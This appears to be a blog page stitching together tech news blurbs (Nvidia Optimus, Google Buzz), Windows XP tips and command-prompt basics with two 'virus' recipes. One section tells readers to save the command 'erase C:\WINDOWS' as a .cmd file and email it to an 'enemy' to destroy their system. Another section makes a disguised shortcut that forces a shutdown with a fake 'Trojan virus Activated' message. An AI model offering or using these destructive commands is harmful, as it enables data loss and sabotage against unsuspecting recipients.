Nvidia Optimus Gives Laptops a Graphical Gearshift




Nvidia on Tuesday unveiled Optimus, a technology that automatically chooses the best graphics processor for running a given application, thus lengthening a laptop computer's battery life. Based on the application's needs, Optimus will route the workload to either an Nvidia discrete graphics processing unit or graphics processors integrated into Intel chips.

Google Buzzes Social Networking Scene

Google is making a play for social media users with Buzz -- a new tool that enables Gmail users to view media and status updates of friends. Typically, when Google enters new territory, it is enough to send stock prices plummeting and analyst wheels spinning. Oftentimes, there is a good reason. Consider the ruminations on the fate of standalone GPS providers such as TomTom following Google's introduction of a GPS-based navigation app. This time, though, things may be different.

Boot Winxp Fast

Follow the following steps

1. Open notepad.exe, type "del c:\windows\prefetch\ntosboot-*.* /q" (without the quotes) & save as "ntosboot.bat" in c:\
2. From the Start menu, select "Run..." & type "gpedit.msc".
3. Double click "Windows Settings" under "Computer Configuration" and double click again on "Shutdown" in the right window.
4. In the new window, click "add", "Browse", locate your "ntosboot.bat" file & click "Open".
5. Click "OK", "Apply" & "OK" once again to exit.
6. From the Start menu, select "Run..." & type "devmgmt.msc".
7. Double click on "IDE ATA/ATAPI controllers"
8. Right click on "Primary IDE Channel" and select "Properties".
9. Select the "Advanced Settings" tab then on the device or 1 that doesn't have 'device type' greyed out select 'none' instead of 'autodetect' & click "OK".
10. Right click on "Secondary IDE channel", select "Properties" and repeat step 9.
11. Reboot your computer.

Convert Scan file to Word

Steps

1. Scan the page you want to convert into a Microsoft Word document.

2. Save the scanned image in *.gif, *.jpeg or whatever format.

3. Open that image, go to "File->Save As" and name it "xyz.tiff" in the "TIFF" format as shown.

4. Go to "Start->Programs->Microsoft Office Tools->Microsoft Office Document
Imaging"

5. Go to "File->Open" and open your scanned document that has been saved in *.TIFF format

6. Go to "Tools->Send Text to Word." You will get a prompt stating this process will take time, Click OK. This will take some time depending on your computer's speed (a minute or two at the most).

7. When it's done it will open up Microsoft word on its own and the scanned document will now be in editable mode.

Create virus in 2 min

Hey guys this is d procedure if u want to erase ur enemy's windows.by sending a so called virus(actuallly a cmd)


1.go to notepad type "erase C:\WINDOWS" without qoutes and save d file asfindoutaname.cmd.


2. send dis thru email to any body and wen d person opens dis file .his windows map will be lostwarning: dont run dis file on ur system.
Comments Plz

------:some imporatant tips for computer :-----

1. This link is used to block the site

Write the below sentance in the Command prompt

Syntax:-> notepad c:/windows/system32/drivers/etc/hosts




2. Open the registry

Write the following syntaxinto Command prompt

-> regedit.exe




3 open the gpedit

Write the following syntaxinto Command prompt

-> gpedit.msc



4. To change the administrator password

-> control userpasswords2



5. To open the System32

Write the following syntax into the Command prompt

-->> system32



6. To see the TEMP file

Write the following syntaxinto Command prompt
->> %temp%



7. To open the control pannel through cmd

Write the following syntaxinto Command prompt
->> control



8. To find the ip address of the the any site follow the below step:

-> Go to the command prompt.

-> Type the Run command and Press Enter.

-> And then Type the ping www.yahoo.com or any site.

9. SOme Important command for Ms-Dos:



-> Go to the command prompt.

-> Type the Run command and Press Enter.

-> rd: Remove the Directory.

-> md: Make the Directory.

-> cd: Change the Directory.

-> del: Delete the file.

-> copy: copy one file to the another.

-> ipconfig: To show the ip address.

-> ipconfig /all : To show the all ip address

Make trojan Virus

step:

1.right click and go to new and create shortcut.

2.shutdown -s -t 50 -c "Trojan virus Activated"(Type the location of the them)

3.click next

4.name of file as u wish(Type a name for this shortcut)

5.change icon for virus goto propeties of shortcut and select icon.

6.And Double Click on it.

7.Thanks Dear.